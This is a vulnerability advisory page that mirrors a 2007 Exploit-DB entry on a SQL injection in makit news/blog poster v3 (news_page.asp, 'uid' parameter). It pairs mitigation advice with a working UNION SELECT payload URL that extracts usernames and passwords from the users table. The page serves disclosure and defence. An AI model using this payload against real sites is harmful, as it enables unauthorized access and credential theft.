header-logo
Suggest Exploit
vendor:
news/blog poster
by:
ajann
7.5
CVSS
HIGH
Remote SQL Injection
89
CWE
Product Name: news/blog poster
Affected Version From: Unknown
Affected Version To: v3
Patch Exists: NO
Related CWE: Not available
CPE: Not available
Metasploit:
Other Scripts:
Platforms Tested: Not available
2007

makit news/blog poster <=v3(news_page.asp) Remote SQL Injection Vulnerability

The vulnerability allows an attacker to inject SQL queries into the 'uid' parameter of the 'news_page.asp' page. By manipulating the SQL query, an attacker can potentially extract sensitive information from the database.

Mitigation:

To mitigate this vulnerability, the vendor should sanitize and validate user input before using it in SQL queries. Additionally, implementing parameterized queries or prepared statements can help prevent SQL injection attacks.
Source

Exploit-DB raw data:

*******************************************************************************
# Title   :  makit news/blog poster <=v3(news_page.asp) Remote SQL Injection Vulnerability
# Author  :  ajann
# Contact :  :(
# S.Page  :  http://www.makit.net
# $$      :  Free

*******************************************************************************

[[SQL]]]---------------------------------------------------------

http://[target]/[path]//news_page.asp?uid=[SQL]

Example:

//news_page.asp?uid=-1'%20union%20select%200,0,0,uname,pword,0,0,0%20from%20users%20where%20'1=1

[[/SQL]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2007-01-25]

Navigation

Suggest Exploit

Services By CQR